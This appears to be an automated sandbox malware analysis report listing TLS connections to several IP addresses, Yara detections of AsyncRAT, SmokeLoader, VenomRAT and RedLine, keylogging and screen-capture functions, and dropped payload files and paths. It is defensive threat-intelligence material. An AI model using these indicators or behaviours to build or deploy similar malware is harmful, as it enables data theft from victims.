Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50719
Source: unknown	Network traffic detected: HTTP traffic on port 50808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50724
Source: unknown	Network traffic detected: HTTP traffic on port 50721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50723
Source: unknown	Network traffic detected: HTTP traffic on port 50794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50726
Source: unknown	Network traffic detected: HTTP traffic on port 50788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50728
Source: unknown	Network traffic detected: HTTP traffic on port 50803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50727
Source: unknown	Network traffic detected: HTTP traffic on port 50709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50720
Source: unknown	Network traffic detected: HTTP traffic on port 50814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50729
Source: unknown	Network traffic detected: HTTP traffic on port 50715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50696
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50695
Source: unknown	Network traffic detected: HTTP traffic on port 50741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50697
Source: unknown	Network traffic detected: HTTP traffic on port 50712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50805
Source: unknown	Network traffic detected: HTTP traffic on port 50696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50808
Source: unknown	Network traffic detected: HTTP traffic on port 50736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50779
Source: unknown	Network traffic detected: HTTP traffic on port 50768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50773
Source: unknown	Network traffic detected: HTTP traffic on port 50745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50789
Source: unknown	Network traffic detected: HTTP traffic on port 50822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50780
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50782
Source: unknown	Network traffic detected: HTTP traffic on port 50786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50785
Source: unknown	Network traffic detected: HTTP traffic on port 50816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50799
Source: unknown	Network traffic detected: HTTP traffic on port 50791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50798
Source: unknown	Network traffic detected: HTTP traffic on port 50823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50791
Source: unknown	Network traffic detected: HTTP traffic on port 50701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50790
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50793
Source: unknown	Network traffic detected: HTTP traffic on port 50785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50796
Source: unknown	Network traffic detected: HTTP traffic on port 50779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50780 -> 443

Source: unknown	HTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.4:50695 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50696 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50697 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50698 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.84:443 -> 192.168.2.4:50703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.2.16:443 -> 192.168.2.4:50720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.4:50724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:50736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:50737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:50741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:50743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:50746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:50749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:50755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:50759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:50761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50779 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50808 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50814 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50821 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50825 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50833 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50834 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 18.2.vm.exe.29e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.vm.exe.29e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.4114154243.00000000029E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3248787304.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected SmokeLoader

Source: Yara match	File source: 00000003.00000002.1964638535.00000000040B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1731949971.00000000026F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1732147386.00000000040B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1964603084.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected VenomRAT

Source: Yara match	File source: Process Memory Space: vm.exe PID: 5804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vm.exe PID: 5252, type: MEMORYSTR

Contains functionality to log keystrokes (.Net Source)

Source: 18.2.vm.exe.29e0000.1.raw.unpack, Keylogger.cs	.Net Code: KeyboardLayout
Source: 25.2.vm.exe.4e40000.1.raw.unpack, Keylogger.cs	.Net Code: KeyboardLayout

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 13_2_0076ED00 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

13_2_0076ED00

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 13_2_0076ED00 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

13_2_0076ED00

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 13_2_0076FB2F GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

13_2_0076FB2F

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior

Reads the System eventlog

Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 18.2.vm.exe.29e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 18.2.vm.exe.29e0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 25.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 25.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 00000003.00000002.1964638535.00000000040B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1731949971.00000000026F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000003.00000002.1964481125.000000000258D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000012.00000002.4106101148.0000000000060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000019.00000002.3260078878.0000000006010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000013.00000002.3185231236.0000000003860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.1732147386.00000000040B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000012.00000002.4114154243.00000000029E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 00000019.00000002.3248787304.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 00000000.00000002.1731925508.00000000026E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000013.00000002.3151962784.0000000000060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000003.00000002.1964603084.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1732060091.000000000272D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000003.00000002.1964408969.0000000002560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000019.00000002.3139489097.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Found suspicious ZIP file

Source: venom.zip.14.dr	Zip Entry: runvm.bat
Source: lumma.zip.14.dr	Zip Entry: run.bat

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\g2m.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\g2m.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Memory allocated: 75D90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Memory allocated: 75D90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Memory allocated: 75D90000 page execute and read and write

Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Code function: 0_2_00401513 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401513
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Code function: 0_2_00402FD3 RtlCreateUserThread,NtTerminateProcess,	0_2_00402FD3
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Code function: 0_2_0040267C NtEnumerateKey,	0_2_0040267C
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Code function: 0_2_004020C4 LocalAlloc,NtQuerySystemInformation,	0_2_004020C4
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Code function: 0_2_004026DC NtClose,	0_2_004026DC
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Code function: 0_2_004020E3 LocalAlloc,NtQuerySystemInformation,	0_2_004020E3
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Code function: 0_2_004020E7 LocalAlloc,NtQuerySystemInformation,	0_2_004020E7
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Code function: 0_2_004020FC LocalAlloc,NtQuerySystemInformation,	0_2_004020FC
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Code function: 0_2_00402285 NtQuerySystemInformation,	0_2_00402285
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Code function: 0_2_004020B6 LocalAlloc,NtQuerySystemInformation,	0_2_004020B6
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Code function: 0_2_004020B8 LocalAlloc,NtQuerySystemInformation,	0_2_004020B8
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Code function: 0_2_00403149 RtlCreateUserThread,NtTerminateProcess,	0_2_00403149
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Code function: 0_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401553
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Code function: 0_2_00403303 NtTerminateProcess,GetModuleHandleA,CreateFileW,GetForegroundWindow,wcsstr,	0_2_00403303
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Code function: 0_2_0040151E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040151E
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Code function: 0_2_004025DD NtOpenKey,	0_2_004025DD
Source: C:\Users\user\AppData\Roaming\jjistfr	Code function: 3_2_00401513 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	3_2_00401513
